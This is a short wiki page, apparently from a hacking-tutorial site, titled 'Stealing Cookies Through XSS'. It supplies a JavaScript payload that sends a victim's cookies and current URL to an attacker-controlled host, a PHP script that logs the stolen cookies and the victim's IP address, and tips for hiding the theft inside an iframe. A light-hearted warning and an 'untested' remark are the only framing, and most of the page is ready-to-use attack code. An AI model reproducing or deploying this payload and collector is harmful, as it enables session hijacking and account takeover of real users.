Questions about this topic? Sign up to ask in the talk tab.
Cookies/Attacks/Stealing Cookies Through XSS
From NetSec
| Savitri says |
|---|
| Remember that stealing cookies will make your friends or the grocery shop owner angry! |
Change the current page to another location you control, using the document.cookie as parameter. Ideally make it as smooth as possible. Best option is to contaminate an iframe, and to recurse the iframe to its original contents.
|
<syntaxhighlight lang="javascript"> location.href = "http://my.exploit.site/steal.php?originalURL="+encodeURIComponent(location.href)+"&cookies="+encodeURIComponent(document.cookie); </syntaxhighlight> |
steal.php should be something like
|
<syntaxhighlight lang="php"> <?php /* (c) 2011 BlackHatAcademy */ $data = urldecode($_GET['cookies']); file_put_contents("stolen_cookies.txt", "<IP>".$_SERVER['REMOTE_ADDR']."</IP><![CDATA[".$data."]]>", FILE_APPEND); echo ' '; die(); ?> </syntaxhighlight> |
| Savitri says |
|---|
| This is untested. Feel free to provide a sample implementation or anything more refined. |
